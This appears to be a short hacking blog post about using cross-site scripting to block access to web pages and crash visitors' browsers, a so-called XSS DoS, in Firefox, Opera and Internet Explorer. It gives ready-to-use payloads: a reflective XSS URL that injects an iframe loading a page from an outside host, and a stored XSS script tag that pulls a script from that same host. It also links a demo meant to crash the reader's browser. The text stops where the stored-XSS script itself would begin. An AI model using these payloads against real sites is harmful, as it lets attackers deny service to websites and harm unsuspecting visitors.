Dossing Sites & All Browser With XSS.

Today I want to show you some simple cross site scripting dossing. Normal and historical server dos attacks and Ddos attacks where done with hijacked computers attacking a website. Now strictly speaking a Ddos attacks results in the server to become unresponsive. But the actual result is that people can't view the page anymore. We can mimic this with cross site scripting fairly easely. This again shows that cross site scripting really needs to be taken seriously, it is a high danger in many situations and the possibilities are endless. This script that we use does two things: It shuts down access to the webpage, and it Dosses the users browser. This exploit affects fully patched versions of:- Firefox- Opera- Internet explorer.With XSS we can perform:- Reflective, non persistent Dos attack. (limited results)- Stored, persistent Dos attack.If this script is reflective, we can send users a link to the page like this one which could contain some Javascript: http://[site]/[page].php?vul="><iframe src="http://www.0x000000.com/hacks/pow.html"></iframe>If it is stored -much better- we can do the same by inserting this script into the webpage itself: <script src="http://www.0x000000.com/hacks/pow.js"></script>This could dos a full webpage if the data is shown on the index, or on any other page, and with it we mimic the denial of service behavior.Demo: http://www.0x000000.com/hacks/exp_dos.html (should dos your browser)The script used for stored XSS: